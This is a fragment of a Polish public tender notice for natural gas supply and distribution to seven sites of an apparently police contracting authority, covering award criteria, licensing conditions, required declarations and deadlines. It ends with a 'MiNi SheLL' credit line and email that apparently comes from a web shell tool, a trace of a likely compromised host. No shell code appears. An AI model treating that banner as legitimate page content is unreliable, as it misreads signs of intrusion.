class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">ROZDZIAŁ XIX SWZ. OPIS KRYTERIÓW OCENY OFERT, WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT<br/>1.	Kryterium oceny ofert – jedynym kryterium oceny ofert jest cena. <br/>2.	Zamawiający określa najkorzystniejszą ofertę wyłącznie na podstawie najniższej ceny. Zamawiający wybierze ofertę z najniższą ceną.<br/>3.	Jeżeli w postępowaniu o udzielenie zamówienia, w którym jedynym kryterium oceny ofert jest cena, nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy składając oferty dodatkowe nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach. <br/>4.	Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą. <br/>5.	Jeżeli termin związania ofertą upłynął przed wyborem najkorzystniejszej oferty, zamawiający wzywa wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez zamawiającego terminie, pisemnej zgody na wybór jego oferty. <br/>6.	W przypadku braku zgody, o której mowa w pkt 3, oferta podlega odrzuceniu, a Zamawiający zwraca sią o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba ze zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy (Wykonawcy wspólnie ubiegający się o zamówienie), którzy spełniają warunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (minimalny poziom zdolności):<br/>1.1.	Wykonawca spełni warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeżeli wykaże, że posiada aktualną koncesję na obrót paliwami gazowymi wydaną przez Prezesa Urzędu Regulacji Energetyki, zgodnie z art. 32 ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne (tekst jednolity: Dz. U. z 2022 r. poz. 1385 ze zmianami).<br/>1.2.	Wykonawca spełni warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeżeli wykaże, że posiada aktualną koncesję na dystrybucję paliw gazowych wydaną przez Prezesa Urzędu Regulacji Energetyki, zgodnie z art. 32 ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne (tekst jednolity: Dz. U. z 2022 r. poz. 1385 ze zmianami). <br/>1.3.	Wykonawca niebędący Operatorem Systemu Dystrybucyjnego spełni warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeżeli wykaże, że posiada zawartą umowę dystrybucyjną, tzw. Generalną Umowę Dystrybucyjną z Operatorem Systemu Dystrybucyjnego umożliwiającą sprzedaż gazu ziemnego do obiektów Zamawiającego za pośrednictwem sieci dystrybucyjnej OSD lub złoży oświadczenie wykonawcy potwierdzające posiadanie takiej umowy z Operatorem Systemu Dystrybucyjnego na świadczenie usług dystrybucji paliwa gazowego na obszarze, na którym znajduje się miejsce odbioru gazu ziemnego (7 zadań).<br/>2.	Zamawiający nie określa pozostałych warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 1, 3 i 4 ustawy PZP, a dotyczących: zdolności do występowania w obrocie gospodarczym, sytuacji ekonomicznej lub finansowej oraz zdolności technicznej lub zawodowej.<br/>3.	Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy, zgodnie z art. 58 ust. 2 ustawy PZP, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo dla ustanowionego pełnomocnika dołącza się do oferty.<br/>3.2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z treścią art. 117 ust. 2 ustawy PZP, spełnią warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje kompleksową dostawę i dystrybucję gazu ziemnego. <br/>3.3.	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>3.4.	Wspólnicy spółki cywilnej są traktowani jak wykonawcy wspólnie ubiegający się o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	W celu potwierdzenia niepodlegania wykluczeniu Zamawiający nie będzie żądał podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia niżej wskazanych podmiotowych środków dowodowych:<br/>1.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu w zakresie uprawnień do prowadzenia działalności gospodarczej Zamawiający żąda przedstawienia:<br/>1.1.	Aktualnej koncesji na obrót paliwami gazowymi wydanej przez Prezesa Urzędu Regulacji Energetyki, zgodnie z art. 32 ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne (tekst jednolity: Dz. U. z 2022 r. poz. 1385 ze zmianami), oraz<br/>1.2.	Aktualnej koncesji na dystrybucję paliw gazowych wydanej przez Prezesa Urzędu Regulacji Energetyki, zgodnie z art. 32 ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne (tekst jednolity: Dz. U. z 2022 r. poz. 1385 ze zmianami); <br/>1.3.	Od Wykonawcy niebędącego Operatorem Systemu Dystrybucyjnego na obszarze, na którym znajduje się miejsce odbioru gazu (7 obiektów), Zamawiający zażąda przedstawienia: <br/>1.3.1.	aktualnej umowy dystrybucyjnej, tzw. Generalnej Umowy Dystrybucyjnej z Operatorem Systemu Dystrybucyjnego umożliwiającej sprzedaż gazu ziemnego do 7 obiektów Zamawiającego za pośrednictwem sieci dystrybucyjnej OSD, lub <br/>1.3.2.	oświadczenia wykonawcy potwierdzającego posiadanie ww. umowy z Operatorem Systemu Dystrybucyjnego, umożliwiającej sprzedaż gazu ziemnego do 7 obiektów Zamawiającego za pośrednictwem sieci dystrybucyjnej OSD (załącznik nr 7 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I.	Do oferty Wykonawcy zobowiązani są dołączyć<br/>A.	Wykonawca<br/>1.	Wypełniony Formularz ofertowy – oferta – stanowiący załącznik nr 1 do SWZ, składa się, pod rygorem nieważności, w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>2.	Wypełnione w zakresie wskazanym przez Zamawiającego oświadczenia, o których mowa w art. 125 ustawy PZP, tj. oświadczenie o niepodleganiu wykluczeniu (załącznik nr 4 do SWZ) oraz oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 5 do SWZ), przekazuje się, pod rygorem nieważności, w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>3.	Oświadczenie o powierzeniu części zamówienia podwykonawcy zawarte w Formularzu ofertowym (załącznik nr 2 do SWZ) – przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>4.	Pełnomocnictwo, jeśli ofertę podpisuje osoba nie wskazana do reprezentacji w dokumentach rejestrowych Wykonawcy – przekazuje się w postaci elektronicznej i opatruje się przez mocodawcę kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>B.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcja, spółki cywilne) do oferty zobowiązani są dołączyć, oprócz dokumentów wymienionych wyżej w pkt 1:<br/>1.	Pełnomocnictwo od Wykonawców wspólnie ubiegających się o udzielenie zamówienia dla ustanowionego pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – przekazuje się w postaci elektronicznej opatrzonej przez mocodawców kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>2.	Oświadczenie o niepodleganiu wykluczeniu (załącznik nr 4 do SWZ) oraz oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 5 do SWZ) – przekazuje każdy z tych Wykonawców, pod rygorem nieważności, w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje niepodleganie wykluczeniu i spełnianie warunków udziału w postępowaniu.<br/>3.	Oświadczenie o podziale obowiązków (załącznik nr 6 do SWZ), z którego wynika, które dostawy lub usługi wykonają poszczególni wykonawcy – przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>C.	Ofertę oraz wymagane oświadczenia zaleca się sporządzić na drukach stanowiących załączniki do SWZ.<br/>D.	Oferta oraz oświadczenia muszą być złożone w oryginale. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.	Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy, zgodnie z art. 58 ust. 2 ustawy PZP, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo dla ustanowionego pełnomocnika dołącza się do oferty.<br/>3.2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z treścią art. 117 ust. 2 ustawy PZP, spełnią warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje kompleksową dostawę i dystrybucję gazu ziemnego. <br/>3.3.	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>3.4.	Wspólnicy spółki cywilnej są traktowani jak wykonawcy wspólnie ubiegający się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana umowy bez przeprowadzania nowego postępowania o udzielenie zamówienia może nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy PZP.<br/>2.	Zamawiający na podstawie art. 455 ust. 1 pkt 1 ustawy PZP dopuszcza zmiany postanowień umowy bez przeprowadzania nowego postępowania o udzielenie zamówienia w przypadkach szczegółowo określonych w § 13 Projektowanych Postanowień Umowy (załącznik nr 2 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/kwp_wroclaw/proceedings, w zakładce dotyczącej przedmiotowego postępowania (strona internetowa prowadzonego postępowania), w terminie do dnia 09.02.2024 r. do godziny 09:00. 3. Do oferty należy dołączyć wszystkie dokumenty wymagane w SWZ dokumenty.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-09 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com